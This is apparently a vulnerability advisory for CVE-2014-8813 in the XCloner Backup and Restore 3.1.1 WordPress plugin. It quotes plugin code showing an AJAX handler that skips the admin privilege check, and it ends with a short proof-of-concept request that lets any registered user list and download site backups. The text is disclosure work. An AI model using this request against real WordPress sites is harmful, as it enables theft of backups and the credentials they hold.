XCloner Backup and Restore 3.1.1 Backup Download

Homepage:

https://wordpress.org/plugins/xcloner-backup-and-restore/

CVE-ID

CVE-2014-8813

CVSS Score

6.8

CVSS Vector

(AV:N/AC:L/Au:S/C:C/I:N/A:N)

Description:

Similar issue was discovered by Larry W. Cashdollar in similar time (you can compare file sha1 with my tweet).

json_return function doesn’t check admin privileges.

File: xcloner-backup-and-restore\xcloner.php

add_action( 'wp_ajax_json_return', 'json_return' );
function json_return(){
	$_REQUEST['nohtml'] = 1;
	include "admin.cloner.php";
	die();
}

So we can view and download already created backup.

File: xcloner-backup-and-restore\admin.cloner.php

$task = $_REQUEST['task'];
switch ($task) {
    case 'view':
        showBackups($option);
    break;
}
function showBackups($option)
{
    // ----------------------------------------------------------
    // Generate a selectable list of the files in Backup Folder
    // ----------------------------------------------------------
    global $_CONFIG;

    if (!is_dir($_CONFIG['clonerPath'])) {
        E_print("Your backup directory " . $_CONFIG['clonerPath'] . " is not correct! Unable to continue...");
        return;
    }

    // initialise list arrays, directories and files separately and array counters for them
    $d_arr = array();
    $d = 0;
    $f_arr = array();
    $f = 0;
    $s_arr = array();
    $s = 0;

    // obtain the list of backup archive files
    getBackupFiles($d_arr, $f_arr, $s_arr, $d, $f);

    // load presentation layer
    $html = new HTML_cloner();
    $html->showBackups($f_arr, $s_arr, $_CONFIG['clonerPath'], $option);
}

Proof of Concept:

Register as standard user using wp-login.php?action=register then log in using wp-login.php.

http://wordpress-instalation/wp-admin/admin-ajax.php?action=json_return&task=view

Timeline: